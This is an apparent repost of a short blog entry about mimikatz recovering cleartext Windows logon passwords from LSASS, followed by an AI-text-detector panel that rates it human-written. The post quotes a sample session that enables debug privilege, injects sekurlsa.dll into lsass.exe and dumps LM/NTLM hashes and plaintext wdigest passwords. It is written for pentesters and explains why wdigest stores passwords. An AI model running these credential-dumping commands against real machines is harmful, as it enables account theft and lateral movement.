Skip to content
Chimera readability score 76 out of 100, Expert reading level.

I meant to blog about this a while ago, but never got round to it.
Here’s a brief post about very cool feature of a tool called mimikatz.
I’m very grateful to the tool’s author for bringing it to my attention. Until that point, I didn’t realise it was possible to recover the cleartext passwords of logged on windows users. Something that I’m sure most pentesters would find very useful.
Here’s some sample output provided by the author:
mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */ mimikatz # privilege::debug Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # inject::process lsass.exe sekurlsa.dll PROCESSENTRY32(lsass.exe).th32ProcessID = 488 Attente de connexion du client... Serveur connecté à un client ! Message du processus : Bienvenue dans un processus distant Gentil Kiwi SekurLSA : librairie de manipulation des données de sécurités dans LSASS mimikatz # @getLogonPasswords Authentification Id : 0;434898 Package d'authentification : NTLM Utilisateur principal : Gentil User Domaine d'authentification : vm-w7-ult msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c } wdigest : password tspkg : password Authentification Id : 0;269806 Package d'authentification : NTLM Utilisateur principal : Gentil Kiwi Domaine d'authentification : vm-w7-ult msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a } wdigest : waza1234/ tspkg : waza1234/
I wondered why the cleartext password would need to be stored in LSASS – after all every pentester will tell you that you don’t need the password to authenticate, just the hash.
A bit of googling seems to indicate that wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash.

Sentinel — Human

Confidence

The text reads like an informal, reflective blog post by an individual with direct experience, focusing on the technical mechanism and implication of the mimikatz finding.

Signals Detected
low severity: Moderate sentence length variance; personal framing ('I meant to blog', 'I wondered') suggests human voice.
low severity: Clear, focused argument supported by a specific technical context, showing some idiosyncratic emphasis.
low severity: No clear evidence of template matching; the flow is personal rather than purely informational exposition.
low severity: The core technical description and reflection feel authentic to a practitioner, though the context is informal.
Human Indicators
Use of first-person narrative ('I meant to blog', 'I wondered') provides an idiosyncratic voice.
The concluding reflection connects the technical detail back to a broader concept (why passwords are stored) in a way that suggests personal cognitive processing rather than rote summarization.
mimikatz: Tool To Recover Cleartext Passwords From Lsass — Arc Codex